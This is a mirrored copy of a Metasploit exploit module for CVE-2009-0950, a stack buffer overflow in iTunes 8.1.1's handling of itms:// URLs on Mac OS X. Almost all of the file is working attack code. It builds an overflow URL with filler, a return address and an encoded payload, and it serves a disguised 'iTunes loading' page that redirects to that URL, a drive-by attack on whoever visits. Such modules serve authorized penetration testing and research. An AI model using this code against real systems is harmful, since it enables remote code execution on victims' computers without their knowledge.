Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/itms_overflow.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10


11
  # no popup required to visit itms:// URLs in Safari, so throw it in BAP

12
  # include Msf::Exploit::Remote::BrowserAutopwn

13
  # autopwn_info({

14
  #  :ua_name    => HttpClients::SAFARI,

15
  #  :ua_maxver  => "4.1",

16
  #  :ua_minver  => "4.0.5",

17
  #  :javascript => false,

18
  #  :rank       => NormalRanking,

19
  #  :os_name => OperatingSystems::MAC_OSX

20
  # })

21


22
  def initialize(info = {})

23
    super(

24
      update_info(

25
        info,

26
        'Name' => 'Apple OS X iTunes 8.1.1 ITMS Overflow',

27
        'Description' => %q{

28
          This modules exploits a stack-based buffer overflow in iTunes

29
          itms:// URL parsing.  It is accessible from the browser and

30
          in Safari, itms urls will be opened in iTunes automatically.

31
          Because iTunes is multithreaded, only vfork-based payloads should

32
          be used.

33
        },

34
        'Author' => [ 'Will Drewry <redpig[at]dataspill.org>' ],

35
        'License' => MSF_LICENSE,

36
        'References' => [

37
          [ 'CVE', '2009-0950' ],

38
          [ 'OSVDB', '54833' ],

39
          [ 'URL', 'http://support.apple.com/kb/HT3592' ],

40
          [ 'URL', 'http://redpig.dataspill.org/2009/05/drive-by-attack-for-itunes-811.html' ]

41
        ],

42
        'Payload' => {

43
          'Space' => 1024, # rough estimate of what browsers will pass.

44
          'DisableNops' => true, # don't pad out the space.

45
          'BadChars' => '',

46
          # The encoder must be URL-safe otherwise it will be automatically

47
          # URL encoded.

48
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,

49
          'EncoderOptions' =>

50
                        {

51
                          'BufferRegister' => 'ECX', # See the comments below

52
                          'BufferOffset' => 3, # See the comments below

53
                        },

54
        },

55
        'Platform' => %w{osx},

56
        'Targets' => [

57
          [

58
            'OS X',

59
            {

60
              'Platform' => [ 'osx' ],

61
              'Arch' => ARCH_X86,

62
              'Addr' => 'ATe'

63
            },

64
          ]

65
        ],

66
        'DisclosureDate' => '2009-06-01',

67
        'DefaultTarget' => 0,

68
        'Notes' => {

69
          'Reliability' => UNKNOWN_RELIABILITY,

70
          'Stability' => UNKNOWN_STABILITY,

71
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

72
        }

73
      )

74
    )

75
  end

76


77
  # Generate distribution script, which calls our payload using JavaScript.

78
  def generate_itms_page(p)

79
    # Set the base itms url.

80
    # itms:// or itmss:// can be used.  The trailing colon is used

81
    # to start the attack.  All data after the colon is copied to the

82
    # stack buffer.

83
    itms_base_url = "itms://:"

84
    itms_base_url << rand_text_alpha(268)  # Fill up the real buffer

85
    itms_base_url << rand_text_alpha(16)   # $ebx, $esi, $edi, $ebp

86
    itms_base_url << target['Addr'] # hullo there, jmp *%ecx!

87
    # The first '/' in the buffer will terminate the copy to the stack buffer.

88
    # In addition, $ecx will be left pointing to the last 6 bytes of the heap

89
    # buffer containing the full URL.  However, if a colon and a ? occur after

90
    # the value in ecx will point to that point in the heap buffer.  In our

91
    # case, it will point to the beginning.  The ! is there to make the

92
    # alphanumeric shellcode execute easily.  (This is why we need an offset

93
    # of 3 in the payload).

94
    itms_base_url << "/:!?" # Truncate the stack buffer overflow and prep for payload

95
    itms_base_url << p # Wooooooo! Payload time.

96
    # We drop on a few extra bytes as the last few bytes can sometimes be

97
    # corrupted.

98
    itms_base_url << rand_text_alpha(4)

99


100
    # Use the pattern creator to simplify exploit creation :)

101
    # itms_base_url << Rex::Text.pattern_create(1024,

102
    #                                           Rex::Text::DefaultPatternSets)

103


104
    # Return back an example URL.  Using an iframe doesn't work with all

105
    # browsers, but that's easy enough to fix if you need to.

106
    return String(<<~EOS)

107
      <html>

108
      <head>

109
      <title>iTunes loading . . .</title>

110
      <meta http-equiv="refresh" content="0; url='#{itms_base_url}'">

111
      </head>

112
      <body>

113
      <p>iTunes should open automatically, but if it doesn't, click to

114
      <a href="#{itms_base_url}">continue</a>.</p>

115
      </body>

116
      </html>

117
    EOS

118
  end

119


120
  def on_request_uri(cli, request)

121
    print_status("Generating payload...")

122
    return unless (p = regenerate_payload(cli))

123


124
    # print_status("=> #{payload.encoded}")

125
    print_status("=> #{payload.encoded.length} bytes")

126


127
    print_status("Generating HTML container...")

128
    page = generate_itms_page(payload.encoded)

129
    # print_status("=> #{page}")

130
    print_status("Sending itms page")

131


132
    header = { 'Content-Type' => 'text/html' }

133
    send_response_html(cli, page, header)

134
    handler(cli)

135
  end

136
end

137


138